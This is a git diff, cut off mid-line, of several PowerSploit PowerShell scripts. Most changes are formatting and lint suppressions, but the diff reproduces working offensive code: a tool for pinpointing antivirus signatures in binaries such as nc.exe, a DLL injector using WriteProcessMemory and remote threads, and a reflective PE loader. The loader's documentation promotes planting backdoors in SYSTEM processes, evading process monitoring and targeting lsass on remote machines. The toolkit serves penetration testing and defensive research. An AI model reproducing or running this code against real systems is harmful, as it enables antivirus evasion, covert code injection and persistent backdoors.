diff --git a/AntivirusBypass/Find-AVSignature.ps1 b/AntivirusBypass/Find-AVSignature.ps1 index d2487b3e..05cd9690 100644 --- a/AntivirusBypass/Find-AVSignature.ps1 +++ b/AntivirusBypass/Find-AVSignature.ps1 @@ -5,11 +5,11 @@ function Find-AVSignature Locate tiny AV signatures. -PowerSploit Function: Find-AVSignature -Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Find-AVSignature +Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -37,19 +37,19 @@ Optionally specifies the directory to write the binaries to. .PARAMETER BufferLen -Specifies the length of the file read buffer . Defaults to 64KB. +Specifies the length of the file read buffer . Defaults to 64KB. .PARAMETER Force -Forces the script to continue without confirmation. +Forces the script to continue without confirmation. .EXAMPLE -PS C:\> Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe -PS C:\> Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose -PS C:\> Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose -PS C:\> Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose -PS C:\> Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose +Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe +Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose +Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose +Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose +Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose .NOTES @@ -63,10 +63,12 @@ http://www.exploit-monday.com/ http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2 #> - [CmdletBinding()] Param( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( [Parameter(Mandatory = $True)] [ValidateRange(0,4294967295)] - [UInt32] + [UInt32] $StartByte, [Parameter(Mandatory = $True)] @@ -75,23 +77,21 @@ http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2 [Parameter(Mandatory = $True)] [ValidateRange(0,4294967295)] - [UInt32] + [UInt32] $Interval, [String] - [ValidateScript({Test-Path $_ })] + [ValidateScript({Test-Path $_ })] $Path = ($pwd.path), [String] $OutPath = ($pwd), - - - [ValidateRange(1,2097152)] - [UInt32] - $BufferLen = 65536, - + + [ValidateRange(1,2097152)] + [UInt32] + $BufferLen = 65536, + [Switch] $Force - ) #test variables @@ -99,88 +99,88 @@ http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2 $Response = $True if (!(Test-Path $OutPath)) { if ($Force -or ($Response = $psCmdlet.ShouldContinue("The `"$OutPath`" does not exist! Do you want to create the directory?",""))){new-item ($OutPath)-type directory} - } + } if (!$Response) {Throw "Output path not found"} if (!(Get-ChildItem $Path).Exists) {Throw "File not found"} [Int32] $FileSize = (Get-ChildItem $Path).Length if ($StartByte -gt ($FileSize - 1) -or $StartByte -lt 0) {Throw "StartByte range must be between 0 and $Filesize"} [Int32] $MaximumByte = (($FileSize) - 1) if ($EndByte -ceq "max") {$EndByte = $MaximumByte} - - #Recast $Endbyte into an Integer so that it can be compared properly. - [Int32]$EndByte = $EndByte - - #If $Endbyte is greater than the file Length, use $MaximumByte. + + #Recast $Endbyte into an Integer so that it can be compared properly. + [Int32]$EndByte = $EndByte + + #If $Endbyte is greater than the file Length, use $MaximumByte. if ($EndByte -gt $FileSize) {$EndByte = $MaximumByte} - - #If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte. - if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval} - Write-Verbose "StartByte: $StartByte" - Write-Verbose "EndByte: $EndByte" - + #If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte. + if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval} + + Write-Verbose "StartByte: $StartByte" + Write-Verbose "EndByte: $EndByte" + #find the filename for the output name [String] $FileName = (Split-Path $Path -leaf).Split('.')[0] #Calculate the number of binaries [Int32] $ResultNumber = [Math]::Floor(($EndByte - $StartByte) / $Interval) if (((($EndByte - $StartByte) % $Interval)) -gt 0) {$ResultNumber = ($ResultNumber + 1)} - + #Prompt user to verify parameters to avoid writing binaries to the wrong directory $Response = $True if ( $Force -or ( $Response = $psCmdlet.ShouldContinue("This script will result in $ResultNumber binaries being written to `"$OutPath`"!", "Do you want to continue?"))){} if (!$Response) {Return} - - Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"." + + Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"." [Int32] $Number = [Math]::Floor($Endbyte/$Interval) - - #Create a Read Buffer and Stream. - #Note: The Filestream class takes advantage of internal .NET Buffering. We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc. - [Byte[]] $ReadBuffer=New-Object byte[] $BufferLen - [System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen) - - #write out the calculated number of binaries - [Int32] $i = 0 - for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++) - { - # If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval - if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte} - else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))} - - Write-Verbose "Byte 0 -> $($SplitByte)" - - #Reset ReadStream to beginning of file - $ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null - - #Build a new FileStream for Writing - [String] $outfile = Join-Path $OutPath "$($FileName)_$($SplitByte).bin" - [System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen) - - [Int32] $BytesLeft = $SplitByte - Write-Verbose "$($WriteStream.name)" - - #Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer - while ($BytesLeft -gt $BufferLen){ - [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen) - $WriteStream.Write($ReadBuffer, 0, $count) - $BytesLeft = $BytesLeft - $count - } - - #Write the remaining bytes to the file - do { - [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft) - $WriteStream.Write($ReadBuffer, 0, $count) - $BytesLeft = $BytesLeft - $count - } - until ($BytesLeft -eq 0) - $WriteStream.Close() - $WriteStream.Dispose() + + #Create a Read Buffer and Stream. + #Note: The Filestream class takes advantage of internal .NET Buffering. We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc. + [Byte[]] $ReadBuffer=New-Object byte[] $BufferLen + [System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen) + + #write out the calculated number of binaries + [Int32] $i = 0 + for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++) + { + # If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval + if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte} + else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))} + + Write-Verbose "Byte 0 -> $($SplitByte)" + + #Reset ReadStream to beginning of file + $ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null + + #Build a new FileStream for Writing + [String] $outfile = Join-Path $OutPath "$($FileName)_$($SplitByte).bin" + [System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen) + + [Int32] $BytesLeft = $SplitByte + Write-Verbose "$($WriteStream.name)" + + #Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer + while ($BytesLeft -gt $BufferLen){ + [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen) + $WriteStream.Write($ReadBuffer, 0, $count) + $BytesLeft = $BytesLeft - $count + } + + #Write the remaining bytes to the file + do { + [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft) + $WriteStream.Write($ReadBuffer, 0, $count) + $BytesLeft = $BytesLeft - $count } - Write-Verbose "Files written to disk. Flushing memory." - $ReadStream.Dispose() - - #During testing using large binaries, memory usage was excessive so lets fix that - [System.GC]::Collect() - Write-Verbose "Completed!" + until ($BytesLeft -eq 0) + $WriteStream.Close() + $WriteStream.Dispose() + } + Write-Verbose "Files written to disk. Flushing memory." + $ReadStream.Dispose() + + #During testing using large binaries, memory usage was excessive so lets fix that + [System.GC]::Collect() + Write-Verbose "Completed!" } diff --git a/CodeExecution/Invoke-DllInjection.ps1 b/CodeExecution/Invoke-DllInjection.ps1 index 369d606a..d23e9894 100644 --- a/CodeExecution/Invoke-DllInjection.ps1 +++ b/CodeExecution/Invoke-DllInjection.ps1 @@ -5,15 +5,19 @@ function Invoke-DllInjection Injects a Dll into the process ID of your choosing. -PowerSploit Function: Invoke-DllInjection -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Invoke-DllInjection +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION Invoke-DllInjection injects a Dll into an arbitrary process. +It does this by using VirtualAllocEx to allocate memory the size of the +DLL in the remote process, writing the names of the DLL to load into the +remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread +to invoke LoadLibraryA in the context of the remote process. .PARAMETER ProcessID @@ -40,6 +44,8 @@ Use the '-Verbose' option to print detailed information. http://www.exploit-monday.com #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] Param ( [Parameter( Position = 0, Mandatory = $True )] [Int] @@ -59,7 +65,7 @@ http://www.exploit-monday.com { Throw "Process does not exist!" } - + # Confirm that the path to the dll exists try { @@ -79,11 +85,11 @@ http://www.exploit-monday.com Param ( [OutputType([Type])] - + [Parameter( Position = 0)] [Type[]] $Parameters = (New-Object Type[](0)), - + [Parameter( Position = 1 )] [Type] $ReturnType = [Void] @@ -98,7 +104,7 @@ http://www.exploit-monday.com $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder.SetImplementationFlags('Runtime, Managed') - + Write-Output $TypeBuilder.CreateType() } @@ -107,11 +113,11 @@ http://www.exploit-monday.com Param ( [OutputType([IntPtr])] - + [Parameter( Position = 0, Mandatory = $True )] [String] $Module, - + [Parameter( Position = 1, Mandatory = $True )] [String] $Procedure @@ -128,7 +134,7 @@ http://www.exploit-monday.com $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $tmpPtr = New-Object IntPtr $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) - + # Return the address of the function Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) } @@ -142,43 +148,43 @@ http://www.exploit-monday.com [String] $Path ) - + # Parse PE header to see if binary was compiled 32 or 64-bit $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read) - + [Byte[]] $MZHeader = New-Object Byte[](2) $FileStream.Read($MZHeader,0,2) | Out-Null - + $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) if ($Header -ne 'MZ') { $FileStream.Close() Throw 'Invalid PE header.' } - + # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header) $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null - + [Byte[]] $lfanew = New-Object Byte[](4) - + # Read offset to the PE Header (will be read in reverse) $FileStream.Read($lfanew,0,4) | Out-Null - $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join '')) - + $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join '')) + # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2) - + # Read compiled architecture $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null - $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '') + $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '') $FileStream.Close() - + if (($Architecture -ne '014C') -and ($Architecture -ne '8664')) { Throw 'Invalid PE header or unsupported architecture.' } - + if ($Architecture -eq '014C') { Write-Output 'X86' @@ -193,7 +199,7 @@ http://www.exploit-monday.com } } - + # Get addresses of and declare delegates for essential Win32 functions. $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) @@ -307,7 +313,7 @@ http://www.exploit-monday.com { Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))" } - + $VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000) # Close process handle @@ -317,7 +323,7 @@ http://www.exploit-monday.com # Extract just the filename from the provided path to the dll. $FileName = (Split-Path $Dll -Leaf).ToLower() - $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.ToLower().Contains($FileName) } + $DllInfo = (Get-Process -Id $ProcessID).Modules | Where-Object { $_.FileName.ToLower().Contains($FileName) } if (!$DllInfo) { diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 42900fbc..c756dd99 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -3,8 +3,8 @@ function Invoke-ReflectivePEInjection <# .SYNOPSIS -This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, -or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, +This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, +or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. @@ -17,15 +17,15 @@ this will load and execute the DLL/EXE in to memory without writing any files to As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. This is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output -from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the -remote process. +from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the +remote process. -PowerSploit Function: Invoke-ReflectivePEInjection -Author: Joe Bialek, Twitter: @JosephBialek -Code review and modifications: Matt Graeber, Twitter: @mattifestation -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Invoke-ReflectivePEInjection +Author: Joe Bialek, Twitter: @JosephBialek +Code review and modifications: Matt Graeber, Twitter: @mattifestation +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -42,13 +42,13 @@ Optional, an array of computernames to run the script on. .PARAMETER FuncReturnType Optional, the return type of the function being called in the DLL. Default: Void - Options: String, WString, Void. See notes for more information. - IMPORTANT: For DLLs being loaded remotely, only Void is supported. - + Options: String, WString, Void. See notes for more information. + IMPORTANT: For DLLs being loaded remotely, only Void is supported. + .PARAMETER ExeArgs Optional, arguments to pass to the executable being reflectively loaded. - + .PARAMETER ProcName Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this. @@ -66,7 +66,7 @@ Optional, will force the use of ASLR on the PE being loaded even if the PE indic .PARAMETER DoNotZeroMZ Optional, will not wipe the MZ from the first two bytes of the PE. This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once. - + .EXAMPLE Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). @@ -76,7 +76,7 @@ Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -Computer .EXAMPLE Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print - the wchar_t* returned by WStringFunc() from all the computers. + the wchar_t* returned by WStringFunc() from all the computers. $PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll') Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) @@ -102,19 +102,19 @@ Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Tar GENERAL NOTES: The script has 3 basic sets of functionality: 1.) Reflectively load a DLL in to the PowerShell process - -Can return DLL output to user when run remotely or locally. - -Cleans up memory in the PS process once the DLL finishes executing. - -Great for running pentest tools on remote computers without triggering process monitoring alerts. - -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info. + -Can return DLL output to user when run remotely or locally. + -Cleans up memory in the PS process once the DLL finishes executing. + -Great for running pentest tools on remote computers without triggering process monitoring alerts. + -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info. 2.) Reflectively load an EXE in to the PowerShell process. - -Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally. - -Cleans up memory in the PS process once the DLL finishes executing. - -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts. + -Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally. + -Cleans up memory in the PS process once the DLL finishes executing. + -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts. 3.) Reflectively inject a DLL in to a remote process. - -Can NOT return DLL output to the user when run remotely OR locally. - -Does NOT clean up memory in the remote process if/when DLL finishes execution. - -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. - -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. + -Can NOT return DLL output to the user when run remotely OR locally. + -Does NOT clean up memory in the remote process if/when DLL finishes execution. + -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. + -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. DLL LOADING NOTES: @@ -159,725 +159,727 @@ Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/ #> +[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] +[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseSingularNouns', '')] +[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] +[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] +[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSPossibleIncorrectComparisonWithNull', '')] [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [Byte[]] $PEBytes, - - [Parameter(Position = 1)] - [String[]] - $ComputerName, - - [Parameter(Position = 2)] + + [Parameter(Position = 1)] + [String[]] + $ComputerName, + + [Parameter(Position = 2)] [ValidateSet( 'WString', 'String', 'Void' )] - [String] - $FuncReturnType = 'Void', - - [Parameter(Position = 3)] - [String] - $ExeArgs, - - [Parameter(Position = 4)] - [Int32] - $ProcId, - - [Parameter(Position = 5)] - [String] - $ProcName, + [String] + $FuncReturnType = 'Void', + + [Parameter(Position = 3)] + [String] + $ExeArgs, + + [Parameter(Position = 4)] + [Int32] + $ProcId, + + [Parameter(Position = 5)] + [String] + $ProcName, [Switch] $ForceASLR, - [Switch] - $DoNotZeroMZ + [Switch] + $DoNotZeroMZ ) Set-StrictMode -Version 2 $RemoteScriptBlock = { - [CmdletBinding()] - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Byte[]] - $PEBytes, - - [Parameter(Position = 1, Mandatory = $true)] - [String] - $FuncReturnType, - - [Parameter(Position = 2, Mandatory = $true)] - [Int32] - $ProcId, - - [Parameter(Position = 3, Mandatory = $true)] - [String] - $ProcName, + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Byte[]] + $PEBytes, + + [Parameter(Position = 1, Mandatory = $true)] + [String] + $FuncReturnType, + + [Parameter(Position = 2, Mandatory = $true)] + [Int32] + $ProcId, + + [Parameter(Position = 3, Mandatory = $true)] + [String] + $ProcName, [Parameter(Position = 4, Mandatory = $true)] [Bool] $ForceASLR - ) - - ################################### - ########## Win32 Stuff ########## - ################################### - Function Get-Win32Types - { - $Win32Types = New-Object System.Object - - #Define all the structures/enums that will be used - # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html - $Domain = [AppDomain]::CurrentDomain - $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) - $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] - - - ############ ENUM ############ - #Enum MachineType - $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16]) - $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null - $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null - $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null - $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null - $MachineType = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType - - #Enum MagicType - $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16]) - $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null - $MagicType = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType - - #Enum SubSystemType - $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16]) - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null - $SubSystemType = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType - - #Enum DllCharacteristicsType - $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16]) - $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null - $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null - $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null - $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null - $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null - $DllCharacteristicsType = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType - - ########### STRUCT ########### - #Struct IMAGE_DATA_DIRECTORY - $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8) - ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null - ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null - $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY - - #Struct IMAGE_FILE_HEADER - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20) - $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null - $IMAGE_FILE_HEADER = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER - - #Struct IMAGE_OPTIONAL_HEADER64 - $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240) - ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null - ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null - ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null - ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null - ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null - ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null - ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null - ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null - ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null - ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null - ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null - ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | 